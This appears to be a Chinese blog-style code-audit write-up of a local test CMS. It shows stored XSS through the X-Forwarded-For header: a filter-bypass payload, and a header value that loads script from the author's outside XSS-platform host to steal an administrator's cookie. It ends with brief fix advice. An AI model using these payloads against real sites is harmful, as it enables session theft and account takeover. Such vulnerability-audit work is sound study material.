前言:
x-forwarded-for大家应该都不陌生,是用来获取客户端的ip地址的,在实际开发应用中也是非常广泛的,今天这篇博客的主要内容就是x-forwarded-for注入xss代码来获得管理员cookie。
审计的源码还是上次install.php重装漏洞的源码。
步骤:
1.访问正常用户登录页面如下:
2.找到源码中对应的文件进行审计,代码如下:
<?php
include_once('../sys/config.php');
if (isset($_POST['submit']) && !empty($_POST['user']) && !empty($_POST['pass'])) {
$clean_name = clean_input($_POST['user']);
$clean_pass = clean_input($_POST['pass']);
$query = "SELECT * FROM users WHERE user_name = '$clean_name' AND user_pass = SHA('$clean_pass')";
$data = mysql_query($query, $conn) or die('Error!!');
if (mysql_num_rows($data) == 1) {
$row = mysql_fetch_array($data);
$_SESSION['username'] = $row['user_name'];
$_SESSION['avatar'] = $row['user_avatar'];
$ip = sqlwaf(get_client_ip()); //活得客户端ip地址
$query = "UPDATE users SET login_ip = '$ip' WHERE user_id = '$row[user_id]'";
mysql_query($query, $conn) or die("updata error!");
header('Location: user.php');
}
else {
$_SESSION['error_info'] = '用户名或密码错误';
header('Location: login.php');
}
mysql_close($conn);
}
else {
not_find($_SERVER['PHP_SELF']);
}
?>
3.通过上面的代码知道存在$ip = sqlwaf(get_client_ip());是用来获取客户端的ip地址的,但是进入到了sqlwaf()函数里面,继续跟踪sqlwaf()代码如下:
function sqlwaf( $str ) {
$str = str_ireplace( "and", "sqlwaf", $str );
$str = str_ireplace( "or", "sqlwaf", $str );
$str = str_ireplace( "from", "sqlwaf", $str );
$str = str_ireplace( "execute", "sqlwaf", $str );
$str = str_ireplace( "update", "sqlwaf", $str );
$str = str_ireplace( "count", "sqlwaf", $str );
$str = str_ireplace( "chr", "sqlwaf", $str );
$str = str_ireplace( "mid", "sqlwaf", $str );
$str = str_ireplace( "char", "sqlwaf", $str );
$str = str_ireplace( "union", "sqlwaf", $str );
$str = str_ireplace( "select", "sqlwaf", $str );
$str = str_ireplace( "delete", "sqlwaf", $str );
$str = str_ireplace( "insert", "sqlwaf", $str );
$str = str_ireplace( "limit", "sqlwaf", $str );
$str = str_ireplace( "concat", "sqlwaf", $str );
$str = str_ireplace( "script", "sqlwaf", $str );
$str = str_ireplace( "\\", "\\\\", $str );
$str = str_ireplace( "&&", "sqlwaf", $str );
$str = str_ireplace( "||", "", $str );
$str = str_ireplace( "'", "", $str );
$str = str_ireplace( "%", "\%", $str );
$str = str_ireplace( "_", "\_", $str );
return $str;
}
4.通过过滤的代码其实是可以绕过waf进行注入的,就拿<script>alert(/xss/)</script>为例:输入<s||cript>alert(/xss/)</s||cript>即可绕过sqlwaf()函数(原理是什么大家自己看sqlwaf()的代码)。
既然知道了如何进行绕过了,那我们在登陆前通过burpsuite或者modify Headers(浏览器插件)修改x-forwarded-for为:<sCRiPt/SrC=//xsshs.cn/UOZf>(本人xss平台代码)
burpsuite修改方式:
modify Headers修改方式:
5.登录成功了以后,由于是本地搭建和审计的,所以我们打开数据库,看是否将我们构造的xss语句带入到数据库中了,可以看到确实是插入成功了。
6.此时更换管理员账号进行登录,继续审计代码找到管理员查看文件代码:
<?php
include_once('../sys/config.php');
if (isset($_SESSION['admin'])) {
include_once('../header.php');
$query = "SELECT * FROM users ORDER BY user_id";
$data = mysql_query($query, $conn) or die('Error');
mysql_close($conn);
?>
<table class="items table">
<thead>
<tr>
<th id="yw0_c0">Id</th>
<th id="yw0_c4">Name</th>
<th id="yw0_c4">Ip</th>
<th id="yw0_c4">Manege</th>
</thead>
<tbody>
<?php while ($users = mysql_fetch_array($data)) {
$html_user_name = htmlspecialchars($users['user_name']);
?>
<tr class="odd">
<td><?php echo $users['user_id'];?></a></td>
<td><?php echo $html_user_name;?></td>
<td><?php echo $users['login_ip'];?></td>
<td><a href="delUser.php?id=<?php echo $users['user_id'];?>">删除</a></td>
</tr>
<?php } ?>
</tbody>
</table>
<a href="manage.php">返回</a>
<?php
require_once('../footer.php');
}
else {
not_find($_SERVER['PHP_SELF']);
}
?>
7.通过上面的代码分析可以看到<?php echo $users['login_ip'];?>直接在数据库中调用了当前变量进行输出,未做任何过滤,通过管理员页面访问。
8.成功触发xss:
9.后面就是通过cookie登录后台地址就不演示了,都是很简单的操作
修复:
在sqlwaf()中加入过滤xss的代码,例如html实体化操作等。
管理员页面查看用户信息时,进行严格过滤。